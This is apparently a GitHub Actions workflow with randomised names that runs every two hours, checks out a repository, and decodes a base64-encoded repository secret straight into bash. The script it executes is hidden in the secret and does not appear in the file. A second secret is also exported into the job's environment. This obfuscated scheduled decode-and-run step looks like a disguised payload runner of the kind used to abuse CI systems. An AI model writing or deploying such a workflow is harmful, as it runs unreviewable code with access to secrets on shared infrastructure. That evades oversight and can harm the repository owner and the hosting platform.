name: ksDcGMvaZNGX
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  AtKchTcz:
    runs-on: ubuntu-22.04
    env:
      BKbpuUZTiFdZ: ${{ secrets.WEKEBcuWgEZ }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.cHuaCn }}" | base64 -d | bash
